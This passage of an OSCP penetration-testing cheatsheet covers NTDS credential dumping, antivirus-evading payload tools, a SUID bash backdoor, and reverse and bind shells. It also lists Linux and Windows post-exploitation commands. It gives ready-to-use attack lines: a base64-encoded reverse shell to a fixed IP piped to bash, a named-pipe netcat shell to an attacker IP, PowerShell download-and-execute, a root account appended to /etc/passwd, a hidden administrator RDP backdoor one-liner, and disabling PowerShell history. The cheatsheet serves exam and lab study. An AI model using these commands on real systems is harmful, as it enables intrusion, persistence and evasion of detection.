1776 | As the last thing we save the Windows Registry hive.
1777 | 
1778 | ```powershell
1779 | reg.exe save hklm\system c:\system.bak
1780 | ```
1781 | 
1782 | We can then extract back the data on the Kali machine providing the ntds database and the hive.
1783 | 
1784 | ```bash
1785 | impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL
1786 | ```
1787 | 
1788 | # Virus Crafting
1789 | A common way to get into the victim's system is to create executables or runnable files that are with the purpose of gaining reverse shells or dumping sensitive informations. It is important to bypass antivirus and file checks. 
1790 | A good way to know if the crafted file is malicious or not, and respectively a good way to check if the executable files we downloaded have hidden malicious instructions is to use [VirusTotal](https://www.virustotal.com) or other web analyzers. Typically they check for meaningful fingerprint and they compare them to the most common malicious and know fingerprint found. If one ore more fingerprint is recognized, the file will be flagged as dangerous.
1791 | 
1792 | ## [Shellter](https://github.com/ParrotSec/shellter)
1793 | A famous tool to modify a executable files is Shellter. As the GitHub page says, Shellter is a dynamic shellcode injection tool aka dynamic PE infector. It can be used in order to inject shellcode into native Windows applications (currently 32-bit apps only). The shellcode can be something yours or something generated through a framework, such as Metasploit. Providing a PE file (the executable file format for Windows), like some 32 bit installer, Shellter will inject malicious instruction in order to bind with a reverse shell the victim with the attacker machine, once double clicked. It provides also the `stealth mode` that can try to evade antivirus detection with various tecniques.
1794 | 
1795 | ## [Veil Framework](https://github.com/Veil-Framework/Veil)
1796 | Veil is a Framework that generates metasploit payloads that bypass common anti-virus solutions. It can generate a payloads for many scenarios. 
1797 | An example of Veil usage for a simple revshell using a batch file `(.bat)` is the following
1798 | 
1799 | ```bash
1800 | veil -t Evasion -p powershell/meterpreter/rev_tcp.py --ip <IP> --port <PORT>
1801 | ```
1802 | 
1803 | This is binded to the follow meterpreter listener
1804 | 
1805 | ```bash
1806 | msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <LHOST>;set LPORT <LPORT>;run;"
1807 | ```
1808 | 
1809 | # Backdoor
1810 | Leaving a backdoor in a system can easily let us come back later and gain immediatly control over the machine. The simplest "root" backdoor on Linux can be done with bash. Just using
1811 | 
1812 | ```bash
1813 | sudo chmod +s /bin/bash
1814 | ```
1815 | 
1816 | Will set the SUID over the bash binary. That means that using
1817 | 
1818 | ```bash
1819 | /bin/bash -p
1820 | ```
1821 | 
1822 | A **root** shell will be gained. The "-p" option preserve the SUID bit. In this way the bash program is called with the owner privileges (root) and if It is not called with "-p" It remains a normal bash shell. Many programs like linpeas.sh or some privesc checker will anyway find this backdoor and report it.
1823 | 
1824 | # Reverse Shell VS Bind Shell
1825 | What use and when? Typically we use the bind shell in two scenarios. The first is the one in which we already have the access to the machine and we want a persistent access or a backdoor on it. In order to do that we could set a service that binds that port at every boot of the machine. The second scenario is the one in which we are not in the same internal network of the machine and we can't reach our machine from the victim because, for example, we are reaching the victim through web access and to obtain a reverse shell we likely have to enable port forwarding on the router of our networking. In this scenario a bind shell could let the attacker conenct to the victim knowing only the external IP of the victim.
1826 | 
1827 | ## Reverse Shell
1828 | Receiving a command line access to a remote machine, where the victim enstablish the connection to the attacker machine that is the listener.
1829 | 
1830 | Once the reverse shell payload is executed on the victim machine, on the attacker the listener will be
1831 | 
1832 | ```bash
1833 | nc -lvnp 4444 -e /bin/bash
1834 | ```
1835 | 
1836 | ## Bind Shell
1837 | Receiving a command line access to a remote machine, where the victim enstablish the connection to the victim machine that is the listener.
1838 | 
1839 | Once the foothold is gained on the victim machine, It can be set up a listener that opens a shell at every connection. After the following conenction is made, we can obtain a shell access on the victim machine. This command is run from the attacker.
1840 | 
1841 | ```bash
1842 | nc <REMOTE-IP> 4444
1843 | ```
1844 | 
1845 | 
1846 | # Shell Stabilization
1847 | Once we gain a shell, many times we don't have a fully interactive environment. We can use many tools to stabilize it.
1848 | 
1849 | ## Netcat
1850 | From the kali machine we run the listener
1851 | 
1852 | ```bash
1853 | nc -lvp <PORT>
1854 | ```
1855 | 
1856 | From the Windows machine
1857 | 
1858 | ```powershell
1859 | .\nc.exe <IP> <PORT> -e powershell
1860 | ```
1861 | 
1862 | If we have a linux machine
1863 | 
1864 | ```powershell
1865 | .\nc.exe <IP> <PORT> -e bash
1866 | ```
1867 | 
1868 | ## Python3
1869 | Checking if the terminal is tty, otherwhise spawn a tty with python3
1870 | 
1871 | ```bash
1872 | tty
1873 | python3 -c 'import pty; pty.spawn("/bin/bash")'
1874 | ```
1875 | 
1876 | ## Powercat
1877 | We can use Powercat to serve the shell on the listener
1878 | 
1879 | ```bash
1880 | nc -lvp <PORT>
1881 | ```
1882 | 
1883 | ```powershell
1884 | powercat -l -p <PORT> -e cmd
1885 | ```   
1886 | 
1887 | # Useful Linux Commands
1888 | ## File Transfer
1889 | 
1890 | Mount a SMB share in the system
1891 | 
1892 | ```bash
1893 | sudo mount -t cifs -o 'user=<USERNAME>' //<IP>/share /mnt/share
1894 | ```
1895 | 
1896 | Print permissions over a SMB share for the folder Folder
1897 | 
1898 | ```bash
1899 | smbcacls --no-pass //<IP>/share Folder
1900 | ```
1901 | 
1902 | Make a SMB2 server with name test and credentials.
1903 | 
1904 | ```bash
1905 | impacket-smbserver share .  -smb2support -user user -password password
1906 | ```
1907 | The connection will be done from the Windows client using `\\IP\share` as share location and the credentials.
1908 | 
1909 | From the Windows Machine the volume can be mounted with
1910 | 
1911 | ```powershell
1912 | net use H: \\<KALI-IP>\share password /user:user 
1913 | ```
1914 | 
1915 | Transfer files with SSH using a single binary with [pscp](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html)
1916 | 
1917 | ```powershell
1918 | C:\Users\Public\pscp.exe FILE user@<IP>:C:\Users\Public
1919 | ```
1920 | 
1921 | List all installed packages
1922 | 
1923 | ```bash
1924 | dpgk -l
1925 | ```
1926 | 
1927 | List all disks
1928 | 
1929 | ```bash
1930 | lsblk
1931 | ```
1932 | 
1933 | List all mounts
1934 | 
1935 | ```bash
1936 | mount
1937 | ```
1938 | 
1939 | List all kernel modules
1940 | 
1941 | ```bash
1942 | lsmod
1943 | ```
1944 | 
1945 | Gain information of a module
1946 | 
1947 | ```bash
1948 | modinfo <MODULE>
1949 | ```
1950 | 
1951 | View connections and listening ports
1952 | 
1953 | ```bash
1954 | ss -anp
1955 | ```
1956 | 
1957 | Find writable files in the system
1958 | 
1959 | ```bash
1960 | find / -writable -type d 2>/dev/null
1961 | ```
1962 | 
1963 | Find files with SUID in the system
1964 | 
1965 | ```bash
1966 | find / -perm -u=s -type f 2>/dev/null
1967 | ```
1968 | 
1969 | Add a TCPDUMP listener on lo interface
1970 | 
1971 | ```bash
1972 |  sudo tcpdump -i lo -A | grep "searchword"
1973 |  ```
1974 | 
1975 |  List sudoer capabilities for a given user
1976 | 
1977 |  ```bash
1978 | sudo -l
1979 | ```
1980 | 
1981 | List all executed cronjobs
1982 | 
1983 |  ```bash
1984 | grep "CRON" /var/log/syslog
1985 |  ```
1986 | 
1987 | Generating a new user in /etc/passwd
1988 | 
1989 |  ```bash
1990 | openssl passwd <PASSWORD>
1991 | echo "<ROOT-USERNAME>:<PASSWORD-HASH>:0:0:root:/root:/bin/bash" >> /etc/passwd
1992 |  ```
1993 | 
1994 | Get informations of a process
1995 | 
1996 |  ```bash
1997 |  ps u -C <PROCESS-NAME>
1998 | cat /proc/<PID>/status
1999 |  ```
2000 | 
2001 | Base64 encoded and decoded revshell (usually for WEB RCE purpose)
2002 | ```bash
2003 | echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNS80NDQ1IDA+JjE= | base64 -d | bash
2004 | ```
2005 | 
2006 | ```bash
2007 | echo <BASE64 ENCODED REVSHELL> | base64 -d | bash
2008 | ```
2009 | 
2010 | Named pipe revshell (usually for WEB RCE purpose)
2011 | 
2012 | ```bash
2013 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ATTACKER-IP> <PORT> >/tmp/f
2014 | ```
2015 | 
2016 | Show git altered files in a git folder
2017 | 
2018 | ```bash
2019 | git log -p
2020 | ```
2021 | 
2022 | Show git diff of a commit
2023 | 
2024 | ```bash
2025 | git diff-tree -p <COMMIT>
2026 | ```
2027 | 
2028 | Recursive cat in a folder and grep for string "password"
2029 | 
2030 | ```bash
2031 | find . -exec cat {} + | grep -i password
2032 | ```
2033 | 
2034 | Download all the resources on a FTP server
2035 | 
2036 | ```bash
2037 | wget -r --user="USERNAME" --password="PASSWORD" ftp://<IP>
2038 | ```
2039 | 
2040 | # Useful Windows Commands
2041 | Find a file in the system
2042 | 
2043 | ```powershell
2044 | Get-ChildItem -Path C:\ -Include *.EXTENSION -File -Recurse -ErrorAction SilentlyContinue
2045 | ```
2046 | 
2047 | Filter for a specific extension of a file in the Administrator folder
2048 | 
2049 | ```powershell
2050 | Get-ChildItem -Path C:\Users\Administrator\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.kdbx,*.exe,*.png,*.jpg,*.bin,*.zip,*.bak*,*.md -File -Recurse -ErrorAction SilentlyContinue
2051 | ```
2052 | 
2053 | Find groups of the user Administrator
2054 | 
2055 | ```powershell
2056 | net user Administrator
2057 | ```
2058 | 
2059 | Run a user with another user's identity
2060 | 
2061 | ```powershell
2062 | runas /user:Administrator cmd
2063 | ```
2064 | 
2065 | Find identity of the current user
2066 | 
2067 | ```powershell
2068 | whoami
2069 | ```
2070 | 
2071 | Display the groups of the current user
2072 | 
2073 | ```powershell
2074 | whoami /groups
2075 | ```
2076 | 
2077 | Display the user privileges
2078 | 
2079 | ```powershell
2080 | whoami /priv
2081 | ```
2082 | 
2083 | Get a list of all local users
2084 | 
2085 | ```powershell
2086 | Get-LocalUser
2087 | ```
2088 | 
2089 | Get a list of all local groups
2090 | 
2091 | ```powershell
2092 | Get-LocalGroup
2093 | ```
2094 | 
2095 | Get the list of user for a group
2096 | 
2097 | ```powershell
2098 | Get-LocalGroupMember <GROUPNAME>
2099 | ```
2100 | 
2101 | Gather OS info, CPU info, RAM, BIOS version etc...
2102 | 
2103 | ```powershell
2104 | systeminfo
2105 | ```
2106 | 
2107 | Gather network information such as IP, DNS servers, DHCP info etc...
2108 | 
2109 | ```powershell
2110 | ipconfig /all
2111 | ```
2112 | 
2113 | Display routing table
2114 | 
2115 | ```powershell
2116 | route print
2117 | ```
2118 | 
2119 | List active network connection (**-a** for active TCP connections/UDP ports, **-n** for no name resolution, **-o** for displaying process ID)
2120 | 
2121 | ```powershell
2122 | netstat -ano
2123 | ```
2124 | 
2125 | Get informations of installed applications and filter for useful informations. For 32 bit application we use
2126 | ```powershell
2127 | Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname 
2128 | ```
2129 | 
2130 | And for 64 bit applications
2131 | 
2132 | ```powershell
2133 | Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
2134 | ```
2135 | 
2136 | Get the list of running processes
2137 | 
2138 | ```powershell
2139 | Get-Process
2140 | ```
2141 | 
2142 | Get powershell history
2143 | 
2144 | ```powershell
2145 | Get-History
2146 | ```
2147 | 
2148 | If it is used the `Clear-History` command we could retrive the history with `PSReadline`
2149 | 
2150 | ```powershell
2151 | (Get-PSReadlineOption).HistorySavePath
2152 | ```
2153 | 
2154 | In order to prevent also that this history is saved, we must clear the history with
2155 | 
2156 | ```powershell
2157 | Set-PSReadlineOption, -HistorySaveStyle, SaveNothing
2158 | ```
2159 | 
2160 | Run a ps script from RAM
2161 | 
2162 | ```powershell
2163 | iwr -uri http://<ATTACKER-IP>/winPEASx64.exe -Outfile winPEAS.exe
2164 | ```
2165 | or
2166 | 
2167 | ```powershell
2168 | powershell -ep bypass -c "iex(iwr -uri <IP>/script.ps1 -usebasicparsing)"
2169 | ```
2170 | 
2171 | Get a list of the **running** Windows Services
2172 | 
2173 | ```powershell
2174 | Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
2175 | ```
2176 | 
2177 | Show user permissions on a file
2178 | 
2179 | ```powershell
2180 | icacls "C:\path\to\file.exe"
2181 | ```
2182 | 
2183 | Start or stop a service
2184 | 
2185 | ```powershell
2186 | net stop apache2
2187 | net start apache2
2188 | ```
2189 | 
2190 | Print all files in a directory
2191 | 
2192 | ```powershell
2193 | Get-ChildItem -Path "C:\Users\diana\Documents" | ForEach-Object { Write-Host "Contents of $($_.Name):"; Get-Content $_.FullName; Write-Host "-------------------------" }
2194 | ```
2195 | 
2196 | Show listening TCP ports
2197 | 
2198 | ```powershell
2199 | netstat -anp TCP | find "<PORT>"
2200 | ```
2201 | 
2202 | Get the list of the domain computers
2203 | 
2204 | ```powershell
2205 |  net view
2206 |  ```
2207 | 
2208 | View the list of shares in a domain SMB machine
2209 | 
2210 | ```powershell
2211 |  net view \\<COMPUTER-NAME>
2212 | ```
2213 | 
2214 | Recursively copy folder A in folder B
2215 | 
2216 | ```powershell
2217 | Copy-Item C:\path\to\A H:\B -Recurse -Force
2218 | ```
2219 | 
2220 | [Crazywifi's oneliner](https://github.com/crazywifi/Enable-RDP-One-Liner-CMD) for adding user to RDP
2221 | 
2222 | ```powershell
2223 | net user /add (Username) (Password) && net localgroup administrators (Username) /add & net localgroup "Remote Desktop Users" (Username) /add & netsh advfirewall firewall set rule group="remote desktop" new enable=Yes & reg add HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v (Username) /t REG_DWORD /d 0 & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSEnabled /t REG_DWORD /d 1 /f & sc config TermService start= auto
2224 | ```
2225 | 
2226 | Connect via RDP to a machine using password and specific resolution
2227 | 
2228 | ```powershell
2229 | xfreerdp /u:USER /p:'PASSWORD' /v:IP /size:1920x1080
2230 | ```
2231 | 
2232 | # Useful Links
2233 | A very useful website that tells you what the given command does in the detail -> https://explainshell.com/
2234 | # Dictionary
2235 | **LOLBins** used for "Living off the Land" exploits. The attacker uses what he can.
2236 | 
2237 | **LOLBAS** Living Off The Land Binaries, Scripts and Libraries https://lolbas-project.github.io/#
2238 | 


--------------------------------------------------------------------------------
/img/Web Information Gathering Mindmap.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BlessedRebuS/OSCP-Pentesting-Cheatsheet/510d7a40b3add7bac06d9b23ab2b1f01092be542/img/Web Information Gathering Mindmap.pdf


--------------------------------------------------------------------------------
/img/Web Information Gathering Mindmap.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BlessedRebuS/OSCP-Pentesting-Cheatsheet/510d7a40b3add7bac06d9b23ab2b1f01092be542/img/Web Information Gathering Mindmap.png


--------------------------------------------------------------------------------
/img/ad-map.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BlessedRebuS/OSCP-Pentesting-Cheatsheet/510d7a40b3add7bac06d9b23ab2b1f01092be542/img/ad-map.png


--------------------------------------------------------------------------------
/img/kerberos.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BlessedRebuS/OSCP-Pentesting-Cheatsheet/510d7a40b3add7bac06d9b23ab2b1f01092be542/img/kerberos.png


--------------------------------------------------------------------------------
/img/ntlm.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BlessedRebuS/OSCP-Pentesting-Cheatsheet/510d7a40b3add7bac06d9b23ab2b1f01092be542/img/ntlm.png


--------------------------------------------------------------------------------